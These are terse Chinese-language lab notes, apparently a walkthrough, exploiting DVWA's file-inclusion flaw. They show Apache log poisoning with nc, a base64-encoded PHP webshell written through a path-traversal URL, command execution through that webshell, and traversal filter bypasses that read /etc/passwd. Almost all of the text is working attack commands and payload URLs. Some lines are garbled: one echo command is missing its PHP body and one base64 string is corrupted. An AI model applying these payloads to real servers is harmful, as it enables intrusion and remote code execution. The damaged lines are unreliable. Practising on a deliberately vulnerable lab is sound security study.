root@kali:/var/log/apache2#ls -lh
总用量 2.4M
-rw-rw-r-- 1root root 1 6月 28 15:50 access.log
日志毒化:
nc172.19.180.27 80
GET/hazStarthazEnd HTTP/1.1
root@kali:/var/log/apache2#cat access.log
172.19.180.28- - [28/Jun/2016:15:50:53 +0800] "GET /hazStarthazEnd HTTP/1.1" 404 469"-" "-"
echo "" > ../../webshell.php
将上面语名进行base64编码,结果:
ZWNobyAiPD9waHAgc3lzdGVtKGJhc2U2NF9kZWNvZGUoJF9HRVRbJ3AnXSkpOyA/PiIgPiAuLi8uLi93ZWJzaGVsbC5waHA=
利用file include漏洞将上面的WEB SHELL写入dvwa的目录下面(前提a、dvwa目录下要有写的权限;b、日志文件需要有读的权限):
http://172.19.180.27/dvwa/vulnerabilities/fi/?page=../../../../../log/apache2/access.log&a=ZWNobyAiPD9waHAgc3lzdGVtKGJhc2U2NF9kZWNvZGUoJF9HRVRbJ3AnXSkpOyA/PiIgPiAuLi8uLi93ZWJzaGVsbC5waHA=
http://172.19.180.27/dvwa/vulnerabilities/fi/?page=../../../../../log/apache2/access.log&a=ZWNobyAiPD9waHAgc3lzdGVtKGJhc2U2NF9kZWNvZGUoJF9HRVRbJ3AnXSkpOyA/PiIgPiAuLi8uLi93ZWJzaGVsbC5waHA=
生成的文件:
root@kali:/var/www/html/dvwa#cat webshell.php
下面与上面的不同在于转义了$符号
echo "\$_GET['p']));?>" > ../../webshell.php (注意此处区别,$这个符号需要转义,否则在生成的webshell中少了$_GET)
ZWNob6AiPD9waHAgc3lzdGVtKGJhc2U2NF9kZWNvZGUoXCRfR0VUWydwJ10pKTsgPz4ioD6gLi4vLi4vd2Vic2hlbGwucGhwDQo=
http://www.motobit.com/util/base64-decoder-encoder.asp onlinebase64 encoder and encoder
http://172.19.180.27/dvwa/vulnerabilities/fi/?page=../../../../../log/apache2/access.log&a=ZWNobyAiPD9waHAgc3lzdGVtKGJhc2U2NF9kZWNvZGUoXCRfR0VUWydwJ10pKTsgPz4iID4gLi4vLi4vd2Vic2hlbGwucGhw
root@kali:/var/www/html/dvwa#cat webshell.php
http://172.19.180.27/dvwa/webshell.php?p=cGluZyA4LjguOC44IA== 在操作系统上执行ping 8.8.8.8
ps -ef|grep ping
www-data 7857 7718 0 17:19 ? 00:00:00 sh -c ping 8.8.8.8
中等
php -a
php > $a =str_replace( array("../", "..\""), "","..././/..././/..././/..././/..././/..././/etc/passwd");
php > echo$a;
..//..//..//..//..//..//etc/passwd
php > $a =str_replace( array("../", "..\""), "","../../../../../../etc/passwd");
php > echo$a;
etc/passwd
php >
http://172.19.180.27/dvwa/vulnerabilities/fi/?page=....//....//....//....//....//....//etc/passwd
http://172.19.180.27/dvwa/vulnerabilities/fi/?page=..././/..././/..././/..././/..././/..././/etc/passwd